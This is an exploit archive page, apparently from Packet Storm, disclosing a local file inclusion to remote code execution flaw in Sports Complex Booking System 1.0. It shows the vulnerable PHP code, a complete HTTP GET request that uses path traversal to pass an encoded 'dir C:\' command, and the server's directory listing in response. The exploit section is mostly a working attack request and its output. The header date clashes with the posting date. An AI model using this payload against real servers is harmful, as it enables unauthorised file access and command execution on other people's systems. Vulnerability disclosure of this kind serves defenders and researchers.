exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Sports Complex Booking System 1.0 Local File Inclusion

Sports Complex Booking System 1.0 Local File Inclusion
Posted Mar 29, 2022
Authored by Hejap Zairy

Sports Complex Booking System version 1.0 suffers from a local file inclusion vulnerability.

tags | exploit, local, file inclusion
SHA-256 | c37a2040e63761f072da506d3c0fb1c63067a2b28d02b4a6291592e84d8a1f0c

Sports Complex Booking System 1.0 Local File Inclusion

Change Mirror Download
# Title: Sports Complex Booking System  1.0  LFI To RCE
# Author: Hejap Zairy
# Date: 28.07.2022
# Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html
# Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zip
# Reference: https://github.com/Matrix07ksa
# Tested on: Windows, MySQL, Apache



#vulnerability Code php
Needs more filtering require_once

php```
----
<?php $page = isset($_GET['p']) ? $_GET['p'] : 'home'; ?>
<?php require_once('inc/topBarNav.php') ?>
<?php if($_settings->chk_flashdata('success')): ?>
<script>
alert_toast("<?php echo $_settings->flashdata('success') ?>",'success')
</script>
----
```


[+] Payload GET


```
GET /scbs/?p=../../../0day&515=%64%69%72%20%43%3a%5c HTTP/1.1
Host: 0day.gov
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=c9sbs70le23qois1riekoj8osg
Upgrade-Insecure-Requests: 1
```


#Status: CRITICAL



#Response
```
HTTP/1.1 200 OK
Date: Sun, 28 Mar 2022 08:05:28 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
X-Powered-By: PHP/7.4.27
Content-Length: 17
Connection: close
Content-Type: text/html; charset=UTF-8`
</script> Volume in drive C is OS
Volume Serial Number is 2EF1-9DCA

Directory of C:\

03/26/2022 08:51 PM <DIR> 0day
03/26/2022 02:12 PM 19 0day.php
03/17/2022 06:06 AM 12,288 DumpStack.log
03/24/2022 07:14 PM <DIR> Intel
10/31/2021 12:47 AM <DIR> MinGW
10/31/2021 12:58 AM <DIR> mingw32
05/12/2018 08:20 PM <DIR> mingw64
10/31/2021 12:47 AM <DIR> msys64
01/02/2022 09:28 AM <DIR> pen
06/05/2021 03:10 PM <DIR> PerfLogs
03/18/2022 10:27 AM <DIR> Program Files
03/21/2022 01:45 PM <DIR> Program Files (x86)
03/02/2022 11:04 PM <DIR> Python27
01/30/2022 02:34 PM 474 t.txt
03/26/2022 08:33 PM <DIR> Temp
03/26/2022 08:45 PM <DIR> Users
```


# Description:
Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server or execution file If converted rce


# Proof and Exploit:
https://i.imgur.com/tUWZM0X.png
https://i.imgur.com/vrPCGTp.png
https://i.imgur.com/sMyZder.png

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    0 Files
  • 6
    Sep 6th
    0 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close